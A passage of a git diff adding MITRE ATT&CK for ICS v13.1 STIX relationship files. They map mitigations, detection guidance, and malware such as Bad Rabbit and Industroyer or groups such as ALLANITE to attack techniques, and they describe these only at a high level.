b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--df6da4ec-cbe8-4f93-a41f-3726a9491938.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--cfb3b5b2-3ee6-443f-9965-18b5c4b23d93", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--df6da4ec-cbe8-4f93-a41f-3726a9491938", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T16:46:30.174Z", + "description": "Statically defined ARP entries can prevent manipulation and sniffing of switched network traffic, as some AiTM techniques depend on sending spoofed ARP messages to manipulate network host's dynamic ARP tables.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--e1461f8d-6a16-4526-ac0b-0acd27ae8065.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--e1461f8d-6a16-4526-ac0b-0acd27ae8065.json new file mode 100644 index 0000000000000000000000000000000000000000..27b0dc5b798d13c2a8fe973337fdbd3adb8c7d03 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--e1461f8d-6a16-4526-ac0b-0acd27ae8065.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--c6949dc9-04e0-48f7-b88b-02146e09d3ad", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e1461f8d-6a16-4526-ac0b-0acd27ae8065", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:40:47.334Z", + "description": "Collect file hashes. Monitor for file names that do not match their expected hash. Perform file monitoring. Files with known names but in unusual locations are suspect. Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters\"\\u202E\", \"[U+202E]\", and \"%E2%80%AE\". For added context on adversary procedures and background see [Masquerading](https://attack.mitre.org/techniques/T1036) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--e6be2fb4-3815-4e52-8dec-2aed1dc3b7cf.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--e6be2fb4-3815-4e52-8dec-2aed1dc3b7cf.json new file mode 100644 index 0000000000000000000000000000000000000000..dcb5689072789c5e0f7f1d264633585bae9e98f0 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--e6be2fb4-3815-4e52-8dec-2aed1dc3b7cf.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--54c1be03-dd09-4c6e-9e77-7399aa8f058d", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e6be2fb4-3815-4e52-8dec-2aed1dc3b7cf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.154Z", + "relationship_type": "mitigates", + "description": "All field controllers should restrict the modification of programs to only certain users (e.g., engineers, field technician), preferably through implementing a role-based access mechanism.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ea5828bb-5da7-4ed8-83b8-8d3b0e51cb3a.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ea5828bb-5da7-4ed8-83b8-8d3b0e51cb3a.json new file mode 100644 index 0000000000000000000000000000000000000000..aa666c29a62c095a20b7c4224e3d2889f420c3f3 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--ea5828bb-5da7-4ed8-83b8-8d3b0e51cb3a.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--db322807-986b-401b-9e5d-735118fc2d6e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ea5828bb-5da7-4ed8-83b8-8d3b0e51cb3a", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:51:47.079Z", + "description": "Monitor ICS automation protocols for functions that restart or shutdown a device. Commands to restart or shutdown devices may also be observable in traditional IT management protocols.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--edf73653-b2d7-422f-b433-b6a428ff12d4.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--edf73653-b2d7-422f-b433-b6a428ff12d4.json new file mode 100644 index 0000000000000000000000000000000000000000..5b83d2713b0b5b8f76f12fd9d27dc31196dd6286 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--edf73653-b2d7-422f-b433-b6a428ff12d4.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--1d3e94e7-35b8-4f27-98ac-0700430b34da", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--edf73653-b2d7-422f-b433-b6a428ff12d4", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017", + "description": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov 2017, October 27 Bad Rabbit Ransomware Retrieved. 2019/10/27 ", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:31:21.210Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) is disguised as an Adobe Flash installer. When the file is opened it starts locking the infected computer. (Citation: Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f0ac1d07-fccd-4330-93cf-fbc985ee6fb9.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f0ac1d07-fccd-4330-93cf-fbc985ee6fb9.json new file mode 100644 index 0000000000000000000000000000000000000000..30fd47fc810727041cc680804176a47c4442f637 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f0ac1d07-fccd-4330-93cf-fbc985ee6fb9.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--2ac36275-1ce3-4497-b500-8b7baf3d3b03", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f0ac1d07-fccd-4330-93cf-fbc985ee6fb9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.160Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f347b4fe-d829-427d-851a-fff3393441db.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f347b4fe-d829-427d-851a-fff3393441db.json new file mode 100644 index 0000000000000000000000000000000000000000..f2104870dc30f96e7cf91892440200b91c1fbc7e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f347b4fe-d829-427d-851a-fff3393441db.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--a5694cf6-a521-431f-bab5-5c501c540863", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f347b4fe-d829-427d-851a-fff3393441db", + "created": "2021-04-12T07:57:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik August 2019", + "description": "Joe Slowik 2019, August 15 CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack Retrieved. 2019/10/22 ", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-14T20:00:00.650Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) contained a module which leveraged a vulnerability in the Siemens SIPROTEC relays (CVE-2015-5374) to create a Denial of Service against automated protective relays. (Citation: Joe Slowik August 2019)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f703f8b2-b6b9-41f3-a551-6bb3647c45cc.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f703f8b2-b6b9-41f3-a551-6bb3647c45cc.json new file mode 100644 index 0000000000000000000000000000000000000000..f981ffe6e630df01e208b836e3b54afd9c5fbe87 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--f703f8b2-b6b9-41f3-a551-6bb3647c45cc.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--e9a0d105-e7d9-454a-916a-4af8349c6f3f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f703f8b2-b6b9-41f3-a551-6bb3647c45cc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.147Z", + "relationship_type": "mitigates", + "description": "Use file system access controls to protect system and application folders.\n", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fb80368e-b3f6-4fa3-828b-b1cf792ea161.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fb80368e-b3f6-4fa3-828b-b1cf792ea161.json new file mode 100644 index 0000000000000000000000000000000000000000..e89f5818a3771f912e68ab8fa4966d554ef8eb40 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fb80368e-b3f6-4fa3-828b-b1cf792ea161.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--6de6ffe5-33d4-490c-b16f-dcd44b4b0862", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fb80368e-b3f6-4fa3-828b-b1cf792ea161", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:58:34.751Z", + "description": "Monitor executed commands and arguments for binaries that could be involved in data destruction activity, such as SDelete.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc1d3924-3210-4ca6-b3cc-a7a525eab47c.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc1d3924-3210-4ca6-b3cc-a7a525eab47c.json new file mode 100644 index 0000000000000000000000000000000000000000..24c0f17f3893d07e4e537d534e3abb47487d46b6 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc1d3924-3210-4ca6-b3cc-a7a525eab47c.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--5150c355-da60-4545-942f-e05b0c990a36", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fc1d3924-3210-4ca6-b3cc-a7a525eab47c", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:15:27.767Z", + "description": "Monitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc3d0a84-e7c7-415c-ae47-42bc513e9bf9.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc3d0a84-e7c7-415c-ae47-42bc513e9bf9.json new file mode 100644 index 0000000000000000000000000000000000000000..46b1be2ca1cf48275d7f46da205636aed275b799 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc3d0a84-e7c7-415c-ae47-42bc513e9bf9.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--f2bbdc55-1d66-4999-8df5-4ff3226eeb1c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fc3d0a84-e7c7-415c-ae47-42bc513e9bf9", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:55:14.825Z", + "description": "Monitor for network traffic originating from unknown/unexpected hosts. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc4803cb-d6bf-4674-bf40-d4b0997824ba.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc4803cb-d6bf-4674-bf40-d4b0997824ba.json new file mode 100644 index 0000000000000000000000000000000000000000..f2f261719dd74143902be746a2df51db4aba1d2f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc4803cb-d6bf-4674-bf40-d4b0997824ba.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--ec4162c6-78b7-4e8f-bb4e-26114d59f0cf", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fc4803cb-d6bf-4674-bf40-d4b0997824ba", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Eduard Kovacs May 2018", + "description": "Eduard Kovacs 2018, May 10 'Allanite' Group Targets ICS Networks at Electric Utilities in US, UK Retrieved. 2020/01/03 ", + "url": "https://www.securityweek.com/allanite-group-targets-ics-networks-electric-utilities-us-uk" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:40:42.440Z", + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) leverages watering hole attacks to gain access into electric utilities. (Citation: Eduard Kovacs May 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc6cc5f2-ef5b-4a28-a0b2-a277ee98191d.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc6cc5f2-ef5b-4a28-a0b2-a277ee98191d.json new file mode 100644 index 0000000000000000000000000000000000000000..78997362f9fd962df18ed6bb16892289f133501a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fc6cc5f2-ef5b-4a28-a0b2-a277ee98191d.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--85a2fb2f-44e8-47ff-8a74-a0ebbedbc59c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fc6cc5f2-ef5b-4a28-a0b2-a277ee98191d", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:45:25.119Z", + "description": "Monitor and analyze traffic patterns and packet inspection associated with web-based network connections that are sent to malicious or suspicious destinations (e.g., destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g., monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, SCF, HTA, MSI, DLLs, or msiexec.exe).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fcb7733f-553d-43de-a8c6-c85a5cd65041.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fcb7733f-553d-43de-a8c6-c85a5cd65041.json new file mode 100644 index 0000000000000000000000000000000000000000..d113d21681fdf4e234cb91916e1267c855618c8d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fcb7733f-553d-43de-a8c6-c85a5cd65041.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--7fe99b7e-ebe1-40f9-a50c-6d65c3055787", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fcb7733f-553d-43de-a8c6-c85a5cd65041", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.111Z", + "relationship_type": "mitigates", + "description": "Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fcd3fdbf-4909-48ab-85c4-ce4b34172eb0.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fcd3fdbf-4909-48ab-85c4-ce4b34172eb0.json new file mode 100644 index 0000000000000000000000000000000000000000..cbc9a7d4e1240f6741cf245d150ad9edfd17fe83 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fcd3fdbf-4909-48ab-85c4-ce4b34172eb0.json 
@@ -0,0 +1,24 @@ +{ + "type": "bundle", + "id": "bundle--f3447827-2f92-47e5-88d0-f0e0e3f33016", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fcd3fdbf-4909-48ab-85c4-ce4b34172eb0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.106Z", + "relationship_type": "mitigates", + "description": "Restrict browsers to limit the capabilities of malicious ads and Javascript.\n", + "source_ref": "course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fd0340cc-6105-4abd-89d0-60b0d9c00b55.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fd0340cc-6105-4abd-89d0-60b0d9c00b55.json new file mode 100644 index 0000000000000000000000000000000000000000..a4748065144e091df00855b940716ca429bb8e12 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fd0340cc-6105-4abd-89d0-60b0d9c00b55.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--0c2227bf-6aca-49db-b8ca-073b454ab2fe", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fd0340cc-6105-4abd-89d0-60b0d9c00b55", + "created": "2022-09-27T18:41:43.617Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T18:41:43.617Z", + "description": "Collecting information from the I/O image requires analyzing the application program running on the PLC for specific data block reads. Detecting this requires obtaining and analyzing a PLC\u2019s application program, either directly from the device or from asset management platforms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d", + "target_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fd856176-396c-4121-9754-35e49bfa5758.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fd856176-396c-4121-9754-35e49bfa5758.json new file mode 100644 index 0000000000000000000000000000000000000000..6351087b8699e965dfeb81a8a36a7146d8df9649 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fd856176-396c-4121-9754-35e49bfa5758.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--7648e9f3-c30d-43ce-8bbe-9b81eec8a9a3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fd856176-396c-4121-9754-35e49bfa5758", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:41:55.062Z", + "description": "Monitor for newly constructed network connections to untrusted hosts that are used to send or receive data.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fe22637e-7187-4990-b24a-5dc851eec736.json b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fe22637e-7187-4990-b24a-5dc851eec736.json new file mode 100644 index 0000000000000000000000000000000000000000..584967789899528a61150b03236e4cfbe266d49b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/relationship/relationship--fe22637e-7187-4990-b24a-5dc851eec736.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--18618d5c-4f57-4b66-bb18-ae727d25dd8e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fe22637e-7187-4990-b24a-5dc851eec736", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:08:55.507Z", + "description": "Monitor for lack of operational process data which may help identify a loss of communications. This will not directly detect the technique\u2019s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 